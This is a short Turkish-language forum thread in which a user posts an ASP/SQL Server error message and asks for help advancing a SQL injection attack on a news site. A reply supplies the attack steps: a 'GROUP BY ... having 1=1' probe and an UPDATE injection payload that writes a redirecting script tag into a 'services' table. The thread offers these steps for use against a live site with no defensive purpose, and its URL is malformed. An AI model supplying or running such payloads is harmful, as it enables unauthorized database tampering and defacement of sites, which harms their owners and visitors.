Sql İnjeksiyon
-
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' ORDER BY NewsID DESC'.
/asp/lib/database.asp, line 53
hata böle butun forumlara falan bakıyorum hepsi birbirinin aynı c/p olayı benim yardım almak istedigimm konu ikinci asamay gecemedim bu ''order by newsid desc'' tablo ismi olmuyormu onu ogrenmek istiyorum biraz belescilik oluyor ama ikinci asamaya ansıl gecicem burdan bir suru sey denedim ama olmadı
-
Valla 2. aşamasını bilmem bende birazdan bi soru soracam sql injectionla ilgili ama ORDER BY NewsID DESC komutu NewsIDleri zden aya doğru listeler ;)
-
evet news.id sonra GROUP BY news.id having 1=1 yapıcan ve +update+services+set+sName='<script>location="http://index(7).html"</script>';--
bu kodlarla update ediceksin
Toplam Hit: 1007 Toplam Mesaj: 3
